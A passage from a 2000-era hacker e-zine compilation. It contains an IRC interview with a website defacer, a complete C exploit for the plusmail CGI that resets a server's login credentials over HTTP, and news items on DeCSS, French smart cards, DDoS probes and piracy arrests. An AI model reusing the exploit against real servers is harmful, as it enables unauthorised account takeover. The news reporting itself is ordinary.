"He" claims he could have redefaced my stuff easily [15:45] this is funny again since he had to come and ask me to do his chores. [15:45] yeah in the interview he said [15:45] [20:03] i had someone akicked from #hackers on dalnet, [15:45] the kid retaliated, what can i say? [15:45] And even if he did know how to redeface my stuff he wouldn't have gotten [15:45] very far since I patched all the box's I hacked. [15:45] [20:04] that would be blazinweed, he is basically a [15:45] wannabe with no skills to speak of. [15:45] [20:04] i would have re-defaced his stuff easily [15:45] (nt boxen), but i'm not down with that anymore. [15:45] ... [15:45] He also highlights the fact [15:45] that they were only NT boxes that were defaced well i'd like to respond to this by saying i only deface NT boxes because i have no use for them but the unix boxes I keep btw he runs windows :D [15:45] good point [15:46] I'd also like to say a few things about the plusmail exploit [15:46] that he and ytcracker talked about. I've never heard so much bull ever. [15:46] the Hole was found by Herf (of wkD which is my group also) [15:46] but people take notice of defacements because they are 'public' and summarily judge people in the 'scene' by their web 'hacks' [15:46] and all it required was a simple html file that you loaded in your browser [15:46] which then allowed you to bypass the login screeen on dumb servers running plusmail.btw the scanner was written by ytcracker and it was useless anyway since next to no servers run the vulnerable package and the ones that do have long since patched it. [15:47] This is the reason you didn't see it get a slot at securityfocus. [15:47] * plusmail cgi exploit [15:47] - missnglnk [15:47] greets: herf, ytcracker, mosthated, tino [15:47] that one? or a variant [15:47] variant [15:47] ok [15:47] thats on packetstorm btw [15:47] I was one of the first people to have it [15:48] http://packetstorm.securify.com/0001-exploits/plusmail.c [15:48] hrm [15:49] have you confronted sect0r about his comments? [15:49] if so what happened [15:49] if not why not [15:49] :) [15:49] he left before i could [15:50] someone found all his personel info [15:50] nod I'm aware of that [15:50] and he is gone to hide [15:52] anything else you'd like to say? there isn't that much we haven't covered really [15:53] we don't need to drag it out [15:53] :) [15:53] :D [15:53] I think i've readdressed the balance [15:53] do you guys have a site for instance? [15:53] website that is [15:53] yeah but its private [15:54] if you think of anything to add lemme know [15:54] ok [15:54] my email is cruciphux@dok.org [15:54] thanks [15:54] if i'm not online [15:54] tnx [15:54] -end- Session Close: Sun Mar 19 15:55:19 2000 @HWA 07.0 plusmail cgi exploit ~~~~~~~~~~~~~~~~~~~~ /* * plusmail cgi exploit - missnglnk greets: herf, ytcracker, mosthated, tino */ #include #include #include #include #include #include #include #include #include #include #include #include extern int errno; int main(int argc, char **argv) { int argswitch, tport = 80, sockfd, plen, cltlen, lport = 4040; char *target, tmpdata[32768], *password = "default", *username = "jackdidntsetone", pdata[1024], *errcode, *tmpline, *firstline, clntfd, origdata[32768], htmldata[32768]; struct sockaddr_in rmt, srv, clt; struct hostent *he; unsigned long ip; if (argc < 5) { printf("plusmail cgi exploit by missnglnk\n"); printf("%s [-h hostname/ip ] [-p target port] [-u username] [-n newpassword] [-l optional local port]\n", argv[0]); return -1; } while ((argswitch = getopt(argc, argv, "h:p:u:n:l:v")) != -1) { switch (argswitch) { case 'h': if (strlen(optarg) > MAXHOSTNAMELEN) { printf("ERROR: Target hostname too long.\n"); return -1; } target = optarg; break; case 'p': tport = atoi(optarg); break; case 'n': if (strlen(optarg) > 8) { printf("Password length greater than 8 characters.\n"); return -1; } password = optarg; break; case 'u': if (strlen(optarg) > 8) { printf("Username length greater than 8 characters.\n"); return -1; } username = optarg; break; case 'l': lport = atoi(optarg); break; case '?': default: printf("plusmail cgi exploit by missnglnk\n"); printf("%s [-h hostname/ip ] [-p target port] [-u username] [-n newpassword] [-l optional local port]\n", argv[0]); return -1; break; } } argc -= optind; argv += optind; bzero(&rmt, sizeof(rmt)); bzero(&srv, sizeof(srv)); bzero(&clt, sizeof(clt)); bzero(tmpdata, sizeof(tmpdata)); cltlen = sizeof(clt); if ((he = gethostbyname(target)) != NULL) { ip = *(unsigned long *) he->h_addr; } else if ((ip = inet_addr(target)) == NULL) { perror("Error resolving target"); return -1; } rmt.sin_family = AF_INET; rmt.sin_addr.s_addr = ip; rmt.sin_port = htons(tport); srv.sin_family = AF_INET; srv.sin_addr.s_addr = INADDR_ANY; srv.sin_port = htons(lport); if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("Error creating socket"); return -1; } if (connect(sockfd, (struct sockaddr *) & rmt, sizeof(rmt)) < 0) { perror("Error connecting"); return -1; } snprintf(pdata, sizeof(pdata), "username=%s&password=%s&password1=%s&new_login=missnglnk", username, password, password); plen = strlen(pdata); snprintf(tmpdata, sizeof(tmpdata), "POST /cgi-bin/plusmail HTTP/1.0\n" \ "Referer: http://www.pure-security.net\n" \ "User-Agent: Mozilla/4.08 [en] (X11; I; SunOS 5.7 missnglnk)\n" \ "Host: %s\n" \ "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\n" \ "Accept-Encoding: gzip\n" \ "Accept-Language: en\n" \ "Accept-Charset: isp-8859-1,*,utf-8\n" \ "Content-type: application/x-www-form-urlencoded\n" \ "Content-length: %d\n" \ "\n%s\n", target, plen, pdata); if (write(sockfd, tmpdata, strlen(tmpdata)) < strlen(tmpdata)) { perror("Error writing data"); return -1; } bzero(tmpdata, sizeof(tmpdata)); while (read(sockfd, tmpdata, sizeof(tmpdata)) != 0) { strncpy(origdata, tmpdata, sizeof(origdata)); firstline = strtok(tmpdata, "\n"); bzero(tmpdata, sizeof(tmpdata)); if ((errcode = strstr(firstline, "404")) != NULL) { printf("plusmail.cgi aint here buddy.\n"); return -1; } for ((tmpline = strtok(origdata, "\n")); tmpline != NULL; (tmpline = strtok(NULL, "\n"))) { if ((errcode = strstr(tmpline, "
\n", htmldata, target); snprintf(htmldata, sizeof(htmldata), "%s\n", htmldata, target); } else { // sprintf(htmldata, "%s%s\n", htmldata, tmpline); snprintf(htmldata, sizeof(htmldata), "%s%s\n", htmldata, tmpline); } } } if (close(sockfd) < 0) { perror("Error closing socket"); return -1; } strncat(htmldata, "\n
<missnglnk>\0", sizeof(htmldata)); if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("Error creating socket"); return -1; } printf("waiting on port %d...", lport); if (bind(sockfd, (struct sockaddr *) & srv, sizeof(srv)) < 0) { perror("Error binding to socket"); return -1; } if (listen(sockfd, 0) < 0) { perror("Error setting backlog"); return -1; } if ((clntfd = accept(sockfd, (struct sockaddr *) & clt, &cltlen)) < 0) { perror("Error accepting connection"); return -1; } printf("connection from %s:%d\n", inet_ntoa(clt.sin_addr), ntohs(clt.sin_port)); if (!write(clntfd, htmldata, sizeof(htmldata))) { perror("Error writing data"); return -1; } if (close(clntfd) < 0) { perror("Error closing socket"); return -1; } printf("\n%s\n", htmldata); return 0; } @HWA 08.0 2600 activism against the MPAA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.2600.com/ http://www.2600.com/news/2000/0130.html February 2, 2000 FOR IMMEDIATE RELEASE DAY OF ACTION PLANNED AGAINST MOTION PICTURE ASSOCIATION IN 100 CITIES Members of the hacker and open source communities worldwide, along with various civil liberties groups, are planning a massive leafletting campaign on Friday, February 4 to call attention to the recent attempts by the Motion Picture Association of America to shut down thousands of websites. Lawsuits have been filed against hundreds of people, as well as an Internet Service Provider and a magazine, for having information the MPAA wants to keep secret. The controversy centers around a computer program known as DeCSS, thought to be written by a 16 year old in Norway. The program defeats the encryption scheme used by DVD's which prohibits them from being viewed on non-approved machines or computers. It also enables DVD's from one country to be played in another, contrary to the wishes of the movie industry. It does NOT facilitate DVD piracy - in fact, copying DVD's has been possible since their introduction years ago. In its press releases on the subject, the MPAA has claimed that this is a piracy issue and they have subsequently succeeded in getting injunctions against a number of sites that had posted the program in the interests of free speech. This is in effect a lawsuit against the entire Internet community by extremely powerful corporate interests. The lawsuit and the various actions being planned promise to be a real showdown between two increasingly disparate sides in the technological age. The consequences of losing this case are so serious that civil libertarians, professors, lawyers, and a wide variety of others have already stepped forward to help out. Friday's action will be coordinated in 74 cities throughout North America and 26 cities in other parts of the world. Leafletting will take place outside theaters and video stores in these cities - all of which participate in a monthly "2600" gathering. 2600 Magazine has been named in two lawsuits regarding the DeCSS program and has joined with the the growing number of people who will fight these actions by the MPAA until the end. The lawsuit has been filed by the Motion Picture Association of America, Columbia/Tristar, Universal City Studios, Paramount Pictures, Disney Enterprises, Twentieth Century Fox, Metro-Goldwyn-Mayer Studios, and Time Warner Entertainment. Contact: Emmanuel Goldstein (631) 751-2600 ext. 0 leaflet campaign: ~~~~~~~~~~~~~~~~~ CALL TO ACTION 01/30/00 Thousands of copies of the flyer have already been distributed at movie theaters worldwide. Versions are also being made in different languages. The next step will involve a massive action this Friday, February 4, 2000. We call on all 2600 meetings held around the world on that day to head to the local theaters and spread the word of this travesty of justice by handing out as many flyers as possible. Everyone is invited to show up and participate, bring your friends, tell your local Linux User Group, spread the news to any organization you're part of, and join us in advocating justice. We find that once people are made aware of the facts of the case, they become as outraged as we have. TIPS FOR HANDING OUT FLYERS First, make sure you make the flyers distinctive by printing on colored paper if at all possible. The quickest way to do this is to go to a copy shop. Get several hundred at the very least - you WILL go through them quickly. Make sure you can print more if you need them. Familiarize yourself with the facts of the case as presented on www.opendvd.org. It's important to be able to answer questions of people who are interested in learning more. Remember, this is NOT about DVD piracy - that is how the movie industry is trying to portray this case. The issue here is CONTROL of players - whether you have the right to play DVD's on the computer of your choice and whether you should be able to see DVD's from other countries. As well as our freedom to continue reporting on the events, developments and discoveries of the hacker community, in a full and accurate manner. We find that people respond well to "Protect Your Rights" as a catch phrase to get them to take the flyer. Let us know if others work for you. Be courteous to the people passing by - don't block their path and, if they ignore you or even make a snide remark, don't heckle them. We find that the vast majority of people are polite and interested in what you have to say. You'll find that some will even come up to you asking for more flyers! Have a set of master copies (printed on white paper) for others to make copies of their own and hand out in other places. If you are asked to leave by theater management, cooperate and ask them where they would like you to stand. They can't force you to leave the area, only the part that is their property. You can still successfully hand out material to everyone coming and going by positioning yourself in neighboring areas or even in the parking lot. If things become unpleasant, simply head to another theater in a different part of town. (If you run out of theaters, you can always fall back on video stores.) We find that 90% of such confrontations can be averted by befriending security guards and making it clear that you don't intend to be disruptive. @HWA 09.0 Microsoft sends magazine full versions of Windows 2000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by TRDonJuan (Translated from German by Babelfish) http://www.pcwelt.de/content/news/newwindows/2000/03/xn160300005.html Microsoft gave away inadvertently 100,000 Windows-2000-Kopien in the value of approximately 33 million dollar to private users. How the Spanish intelligence service Brujula.com reports, Microsoft wanted to actually pack on 120 days the limited version of the operating system on booklet DS, those approximately 100,000 outputs of the Spanish PC WELT sister " PC World " supplements. Afterwards it turned out however that it concerned at the software a temporally unlimited version inclusive Registrations code. Thus 100,000 installations of Windows are 2000 without license in the circulation. And with a selling price of 330 dollar per copy might have developed for Microsoft a financial damage of 33 million dollar. Who caused the error, is not certain officially. Insider assume however not the magazine, but Microsoft is responsible for the breakdown. Some whisper even, Microsoft -=- Win 2000 gratis auf CD Microsoft hat versehentlich 100.000 Windows-2000-Kopien im Wert von rund 33 Millionen Dollar an private Anwender verschenkt. Wie der spanische Nachrichtendienst Brujula.com berichtet, wollte Microsoft eigentlich die auf 120 Tage limitierte Version des Betriebssystems auf Heft-CDs packen, die rund 100.000 Ausgaben der spanischen PC-WELT-Schwester "PC World" beilagen. Im Nachhinein stellte sich jedoch heraus, dass es sich bei der Software um eine zeitlich unbegrenzte Version inklusive Registrations-Code handelte. Damit sind 100.000 Installationen von Windows 2000 ohne Lizenz im Umlauf. Und bei einem Verkaufspreis von 330 Dollar pro Kopie dürfte Microsoft ein finanzieller Schaden von 33 Millionen Dollar entstanden sein. Wer den Fehler verursacht hat, steht offiziell noch nicht fest. Insider gehen jedoch davon aus, dass nicht die Zeitschrift, sondern Microsoft selbst für die Panne verantwortlich ist. Manche munkeln sogar, Microsoft habe die Vollversion absichtlich auf die CDs gepackt, um die Verkaufszahlen von Windows 2000 in die Höhe zu treiben, und das Ganze anschließend als Versehen deklariert. Denn aufgrund der Monopolstellung, die dem Software-Riesen angekreidet wird, könne er das Betriebssystem nicht offiziell verschenken. Die Ausgabe der PC World Spanien, der die CD-ROM beilag, erzielte auf jeden Fall einen Verkaufsrekord. (PC-WELT, 16.03.2000, sp) @HWA 10.0 HNN:Mar 13th:Mexican Rebels Breached Pentagon Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles According to Arthur L. Money, the chief information officer of the US Defense Department, Mexican Zapatista guerrillas managed to breach the online security systems of some pentagon computers in 1998. Money said that the intruders used systems from the Frankfurt Stock Exchange to launch their attacks. Agence France-Press - via Nando Times http://www.techserver.com/noframes/story/0,2294,500179791-500236658-501166899-0,00.html (Sorry: 404 or expired story link) @HWA 11.0 HNN:Mar 13th:Online Guerrilla War Rages In Brazil ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Online warez groups fighting amongst each other is now considered guerrilla warfare by authorities in Brazil. According to the daily O Globo the Brazilian Hacker Organization (OHB) and the Anti-OHB have been trading insults via web defacements for some time. The Sao Paulo Civil Police Cybercrime Unit is also following attacks by three other active organizations: Hatted Copr, InfernBr and Crime Boys. EFE via COMTEX - via Northern Light http://library.northernlight.com/FC20000310060000049.html?cb=0&dx=1006&sc=0#doc (Pay to play document sorry ... - Ed) @HWA 12.0 HNN:Mar 13th:French Bank Card Algorithm Released ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by alan.hop Serge Humpich was sentenced to a ten month suspended sentence after notifying the French bank, Cartes Bancaires, that its bank cards where vulnerable to fraud. Now the secret that Humpich discovered has been released to the Internet. Bank officials say that the potential for fraud or fake cards is small while security experts fear that the underground will flood the market with fake cards within weeks. Reuters - via Yahoo http://dailynews.yahoo.com/h/nm/20000310/wr/france_cards_1.html Friday March 10 3:07 PM ET Card Alert for French Banks By Catherine Bremer PARIS (Reuters) - France braced for a wave of petty fraud after officials admitted on Friday that a formula posted on the Internet showed how to forge smart payment cards. But Cartes Bancaires, the French interbank group whose card system is affected, said there was no danger that bank accounts would be emptied. Cards made with the formula might be used to buy train tickets or pay parking meters or toll booths although there was no evidence this had actually happened, Cartes Bancaires spokesman Herve de Lacotte told Reuters. ``For the first time in 10 years, a lock has been sprung,'' he said. ``But springing a lock will not necessarily open the door and let you in. There is a theoretical risk of fraud but the problem concerns banks, not consumers or shops.'' Despite claims to the contrary, Lacotte said, false cards made with the code could not be used in cash dispensers, to make shop purchases or for expensive goods. Newspapers leaped on the story, quoting experts as saying the complex 96-digit code could be used to forge three in four of France's 34 million bank cards. Headlines like ``Chip card secret out'' left anyone with a bank card wondering whether their money was safe. ``Consumers have been paying for bank cards that aren't even secure. They've been cheated and lied to,'' said Eric April, Secretary-General of the AFOC consumer group. Lacotte said the scare stories were over the top and the Bank of France accused the press of ``exaggerating the risk.'' ``Even if certain clues relating to this algorithm have been made public... other security measures exist enabling strong limits on the use that can be made of this information,'' the French central bank said in a statement. Cards issued since last autumn had added security which meant the pirate formula would not work for them, he added. SCSSI, the government body in charge of information security systems, urged banks to replace older cards with updated ones. The card formula was posted anonymously on Internet chat site last weekend. It was actually discovered three years ago by computer whizz kid Serge Humpich, who denies using it or circulating but has been given a 10-month suspended prison sentence for cracking the banks' secret. Now that it is public, Humpich says, pirates could buy a chip card kit for around $370 and be turning out false cards within weeks. ``A few weeks from now dozens of false cards are going to appear,'' he told Liberation. @HWA 13.0 HNN:Mar 13th:Still No Suspects in DDoS Attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Investigators are still sifting through mountains of log files but are having a rough time tracing the recent denial of service attacks against online giants Yahoo, ZD Net, CNN, and others. Officials still do not have any suspects and hope that more traditional methods will allow them to locate the culprit(s). San Jose Mercury News http://www.mercurycenter.com/svtech/news/indepth/docs/hack031000.htm Posted at 8:28 p.m. PST Thursday, March 9, 2000 No suspects in cyberattacks Investigators try to track down origin of last month's assaults BY DAVID L. WILSON Mercury News Washington Bureau WASHINGTON -- Federal authorities are continuing to investigate last month's series of attacks on commercial Internet sites, but sources close to the investigation say they have no suspects yet. Investigators are sifting through mountains of data, trying to track the attacks back to their origin using logs from the computers involved, but they concede that building a case using such methods may be difficult, if not impossible. Some believe that a break in case is more likely to come from more traditional methods. ``Often what you see in a cold case is a lead coming from someone who is in custody on an unrelated minor charge who offers information in return for a get-out-of-jail-free card,'' said one person with ties to the investigation. ``If somebody brags that he was behind this, eventually somebody else will roll over on him.'' Often, however, the braggarts are blowing smoke. For instance, a 17-year-old who goes by the moniker ``Coolio'' hinted in online chats that he was behind at least some of the attacks. But federal authorities say there is no evidence that the youth, Dennis Moran of Wolfboro, N.H., was involved. However, Wednesday Moran was charged with two counts of unauthorized access to a computer system in connection with vandalism to the Los Angeles Police Department Web site DARE.com. In last month's attacks on popular Web sites such as Yahoo, eBay and CNN, suspects used a specialized technique known as a distributed denial of service attack. The technique depends on stealth software that has been secretly installed on hundreds of computers connected to the Internet. At a given signal, the programs attack a targeted Web site, flooding it with so much data that normal business is impossible. Investigators are using log files from the computers infected with the stealth software, hoping to track the trail back to the individual who installed the programs, but they have been unsuccessful so far. The difficulties investigators face were summed up in a 60-page report the federal government released Thursday. In a news conference discussing the report, Attorney General Janet Reno said law enforcement faces a number of challenges in cyberspace. ``These challenges include the inability to trace criminals who hide their identities online, difficulty in finding criminals who might be located in other jurisdictions, the need for better coordination among law enforcement agencies, and the need for trained personnel at all levels of law enforcement,'' Reno told reporters. The report generally said that existing laws could deal with crimes in cyberspace. In addition, while highlighting advantages criminals can gain from anonymity on the Internet, the report stressed that anonymity is both important and useful for average citizens. It suggested that any proposed changes in the availability and use of anonymity must be considered very carefully. Despite the report's measured tone, some groups feared a loss of privacy for individuals who could find their every movement in cyberspace tracked if they couldn't maintain anonymity. The American Civil Liberties Union blasted the report in a letter to Reno. ``An end to Internet anonymity would chill free expression in cyberspace,'' the letter declared. ``However, the report treats the anonymity of Internet users as a `thorny issue' rather than a constitutional right.'' Administration officials said the report was merely a starting point for an examination of security in cyberspace, and that the government was fully committed to maintaining privacy for Internet users. Contact David L. Wilson at (202) 383-6020 or dwilson@sjmercury.com @HWA 14.0 HNN:Mar 13th:Japanese Pirates Busted ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench In a report released on March 10th, the Associated Computer Software Copyright Society (ACCS) disclosed two recent cases of piracy involving Internet bulletin boards. A Hokkaido University student living in Sapporo was arrested for selling as many as 30 illegal copies of Microsoft's Office 2000 Professional and other software. He charged a total of 500,000 yen (US$4,693.51) for the CDR copies. A 24-year-old worker living in Takasaki, Gunma prefecture was also recently arrested for advertising and selling illegal software via an Internet bulletin board. He sold software to 20 people for 100,000 yen (US$938.70). He said that he began selling pirated software after he purchased some in the same way. Asia Biz Tech http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/96759 Pirated Software Sales Rampant on Internet Bulletin Board March 13, 2000 (TOKYO) -- A series of recent cases have revealed the extent to which Internet bulletin boards are being used in Japan to sell pirated software. The Associated Computer Software Copyright Society (ACCS) disclosed the extent of the situation on March 10. In just the last 10 days, two cases of copyright violation have been brought to light by the Metropolitan Police Agency and the Aichi Prefecture Police. On Feb. 29, the Metropolitan Police Agency submitted documents to the Tokyo District Public Prosecutors Office regarding the activities of a 22-year-old Hokkaido University student living in Sapporo. The student was using an electronic bulletin board to advertise the sale of pirated software and was accepting orders via e-mail. The items included Microsoft's Office 2000 Professional as well as other office and game software copied to CD-R disks without the copyright holders' permission. Between February and October 1999, the student reportedly sold illegally copied software to some 30 individuals nationwide for a total of about 500,000 yen. (106.53 yen = US$1) The other incident, uncovered by the high-tech crime unit of the Aichi Prefecture Police, involved a 24-year-old worker living in Takasaki, Gunma prefecture. A report on the suspect was submitted to the Nagoya District Public Prosecutors Office on March 1. Like the Sapporo student, the suspect is accused of using a bulletin board operated by a leading Internet service provider to advertise the sale of pirated software and accept online orders. The accused is believed to have sold the software to 20 people during the course of about one month, generating some 100,000 yen in sales. He reportedly confessed that he began selling pirated software after buying it in a similar manner himself. (BizTech News Dept.) @HWA 15.0 HNN:Mar 13th:Online Handles Impose Fear ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Do the handles chosen by online hooligans chosen in an attempt to impose fear? Matt Richtel of the NY Times attempts to explore the meanings of some of the more glamorous handles of the online world. (To bad he completely misses the personal privacy angle. And what about entertainers like Sting, Madonna, John Couger, or Prince?) NY Times http://www.nytimes.com/library/review/031200hacker-handles-review.html (Pay to play url... sorry -Ed) @HWA 16.0 HNN:Mar 13th:Vendors Still Making Insecure Software ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond At a recent congressional panel examining the threat to federal and private-sector computer networks cyber security experts blamed software manufacturers for failing to improve the security features of most consumer software.(People in the underground have been saying this for years.) Reuters - via Excite http://news.excite.com/news/r/000309/15/net-tech-hacker (Server:We're sorry, but this story is not currently available - Ed) @HWA 17.0 HNN:Mar 14th:Smart Card Inventor Issues Challenge ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acoplayse Roland Moreno, whose smart cards he invented have slashed the fraud rate in France by 90 percent in 10 years, rejected claims that an algorithm posted on a Web chat site last week could bypass the cards safeguards. He is so confident of his product that he is offering a million francs ($148,100) to anyone who could prove that they could read a bank's confidential code from the card. Moreno went on to claim that "chip cards are an unpenetrable data system." (So unpenetrable that Serge Humpich recently received a 10 month suspended sentence for defeating the system.) Reuters http://newsnet.reuters.com/cgi-bin/basketview.cgi?b=rcom:science&s=nL133221 From above url; "Boston conventions threaten biotech food fight"... (Appears to be incorrectly linked .. not having much luck following up articles this week :/ sorree .. - Ed) @HWA 18.0 HNN:Mar 14th:MPAA Continues to Harass In Fight Over DeCSS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Macki In the past two months the Motion Picture Association of America has continued to harass and intimidate Internet users all over the world. Letters have been sent, threats have been levied, ISPs have crumbled, people have been fired from their jobs and worse. The fight is not over. 2600 http://www.2600.com/news/2000/0312.html Open DVD http://www.opendvd.org/ @HWA 19.0 HNN:Mar 14th:Tracking Down Coolio ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Carlos Log file analysis and a search engine, those where the most complicated tools needed to track down Coolio (Dennis Moran). Coolio was charged last week with defacing the Dare.org web site. (And this is what the FBI wants all that extra money for?) Associated Press - via ABC News http://www.abcnews.go.com/sections/tech/DailyNews/coolio000313.html On the Trail of a Hacker Court Papers Reveal How Cyber Gumshoe Tracked Teen Dennis Moran, 17, who goes by the name "Coolio" on the Internet, talks with reporters March 8, near his Wolfeboro, N.H., home after being questioned by the FBI about crippling attacks on major Web sites in February. (Ken Williams/Concord Monitor/AP Photo) http://www.abcnews.go.com/media/Tech/images/ap_hacker_000313_h.jpg The Associated Press W O L F E B O R O, N.H., March 13 Recently released court records explain how authorities traced the hacking attack on a popular anti-drug Web site to a Wolfeboro teenager. Dennis Moran, 17, was charged last week with hacking into the Web site of DARE.org and defacing it with pro-drug abuse slogans and images. He has acknowledged he vandalized the Los Angeles-based site and two others, but said he was only joking when he claimed responsibility for the attacks that crippled Yahoo, eBay and other major sites last month. Court records released Friday show police began investigating Moran after noticing his Internet nickname, Coolio, on the defaced DARE.org site in November. At the bottom of the Web site were the messages Coolio is k-r4d and so are drugs and Craftily owned by Coolio :D. Searching in Cyberspace Los Angeles Police Detective Michael Brausman used a search engine to find a Web page that included an e-mail address for Cooliok-r4d.com. He traced the address to another site that included a directory labeled Coolio. Inside the directory was one of the images posted on the DARE site. By late December, the detective had contacted the owner of an Arizona-based server who confirmed he had e-mail messages related to the Coolio directory. A search of the server’s logs showed someone using the e-mail address cooliok-r4d.com had sent messages that included Moran’s name, address and phone number. In one message, Moran inquired about registering cool.io as an Internet domain name. If there’s any way I could buy the domain for this, please email me pricing and information. Thanks, Dennis Moran, he wrote. Brausman called Wolfeboro police Dec. 30. Investigators interviewed Moran on Feb. 17. Moran faces two state charges of unauthorized access to a computer system. Each felony is punishable by up to 15 years in prison and a $4,000 fine. Although Moran also was questioned by the FBI about several denial of service attacks on major commercial sites, including Yahoo.com and eBbay.com, no charges have been filed in those cases. Investigators said they were seeking someone using the Internet signer Coolio in those attacks, but also said the name is used by many people online. @HWA 20.0 HNN:Mar 14th: DOJ Launches Cybercrime Site ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The US Department of Justice has officially launched a cybercrime web site defining computer crime and describing how to report it. The site also includes department's latest thinking on privacy vs. policing on the Internet as well as computer search and seizure guidelines. Associated Press - via Nando Times http://www.techserver.com/noframes/story/0,2294,500180192-500237416-501173875-0,00.html (Sorry dead link ... -Ed :( ) Cybercrime.gov http://www.cybercrime.gov/ @HWA 21.0 HNN:Mar 14th: China Relaxes Crypto Rules ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acoplayse After pressure from the US-China Business Council Chinese authorities have agreed to "clarify" encryption regulations that where published in October last year. the State Encryption Management Commission (SEMC), which reports to the Ministry of State Security, has said that only hardware or software for which encryption is a core function will be limited by the regulations. products that contain encryption as a secondary function will no longer be restricted. This includes browsers, consumer electronics and other items. Financial Times http://news.ft.com/ft/gx.cgi/ftc?pagename=View&c=Article&cid=FT3ZAN1CS5C& live=true&useoverridetemplate=ZZZFKOXOA0C&tagid=ZZZC00L1B0C&subheading= information%20technology&_ref=526610871 China softens rules on encryption By James Kynge - 13 Mar 2000 22:06GMT China has backed away from sweeping restrictions on the use and sale of foreign encryption technology that would have wreaked havoc on the use of foreign software, mobile phones, e-mail and other communications applications. The US-China Business Council, which led a lobbying effort that united several national chambers of commerce in Beijing, said on Monday that Chinese authorities had agreed to "clarify" encryption regulations published in October last year. The main sense of the clarification was that only hardware or software for which encryption is a core function will be limited by the regulations of the State Encryption Management Commission (SEMC), a body that reports to China's intelligence agency, the Ministry of State Security. This means that mobile phone handsets, windows software, browser software and other applications that contain encryption as an ancillary function will not now be restricted. Windows 2000, Microsoft Corp's newest operating system, which is set to be launched in China on March 20, was given approval for sale this month by authorities, prefiguring the relaxation in SEMC's rules. It was not immediately clear what types of products would fall under the definition of having encryption as a core function. Under the SEMC's original restrictions, all businesses and individuals would have had to register with the government any products containing encryption technology. They then would have had to apply for permission to use the goods. But a clarification letter issued by the SEMC allayed fears the government would gain access to corporate secrets carried in encoded communications by requiring companies to hand over their encryption source codes. Business travellers carrying laptops with ordinary software, even if it contains some encryption capabilities, are not required to register, the US-China Business Council quoted the SEMC as saying in a verbal clarification of the regulations. @HWA 22.0 HNN:Mar 14th:Stallman on UCITA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond The Uniform Computer Information Transaction Act will threaten the existence of free software if passed. Richard Stallman the founder of the Free Software Foundation has spoken out vehemently about this legislation and continues to do so. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2457092,00.html Interview: GNU guru Richard Stallman The president of the Free Software Foundation and founder of the free-software movement speaks out against UCITA. By Robert Lemos, ZDNet News March 12, 2000 3:44 PM PT When Richard Stallman founded the GNU (or Gnu's Not Unix) Project in 1984, his aim was to create Unix-compatible tools that were free. Sixteen years later, GNU software is a critical part of most Unix systems and forms the basis -- along with Linus Torvalds' Linux kernel -- of all Linux systems. With the proposed Uniform Computer Information Transaction Act (UCITA) threatening the free-software movement, ZDNet News Senior Editor Robert Lemos caught up with Stallman, president of the Free Software Foundation, in India. ZDNet: What will be the effect of UCITA on the free software movement? Stallman: UCITA would make it harder for us to avoid liability for bugs that turn up in the free software we develop -- while giving proprietary software developers a very easy way to avoid all liability for their products, even for faults that they know about in advance. This is grossly unfair. UCITA would also give proprietary software developers a way to prohibit reverse engineering. They could then promulgate secret formats for distributing and storing data and stop us from implementing free software to handle those formats. We would be unable to provide you with software to access your own data. ZDNet: What will be the effect on GNU development? What about GNU/Linux? Stallman: I don't expect UCITA to have any immediate effect on our software development. But in the long term we will probably have trouble making our software handle the secret data formats and support new hardware whose specifications are secret. Microsoft already said they plan to use secret formats and protocols to block the development of (GNU/) Linux. The format of Word is already a secret, and it is only through reverse engineering that people can figure out anything about it. ZDNet: Will software be worse because of UCITA? Stallman: That is the wrong question. The right question is how will users of software be worse off because of UCITA? I've already explained the problems free software will face. We will face additional obstacles to doing a good job. For non-free software, developers will not face additional obstacles, but they will be able to restrict the users in onerous ways. So even if the software is unchanged, the users will be worse off. For example, the owners will be able to change the software license at any time, restricting what you are allowed to do with a program. They will be able to send you e-mail containing new conditions, and these new conditions will be legally binding on you even if you never actually got the mail. If you do see the mail and you reject the new conditions, they will be able to demand that you stop using the program -- and even send your machine a message across the network to turn off the program without a moment's notice. ZDNet: If there is so much opposition, why has the BSA, and others, had so much success in pushing the bill through? Stallman: As far as I know, they have succeeded in one state. The term "so much success" seems to be an exaggeration. I don't know why they succeeded in Virginia; I can only guess. But here are some things, which are not unusual, which may have happened this time: 1.The supporters of UCITA probably are better organized and have more money to contribute to 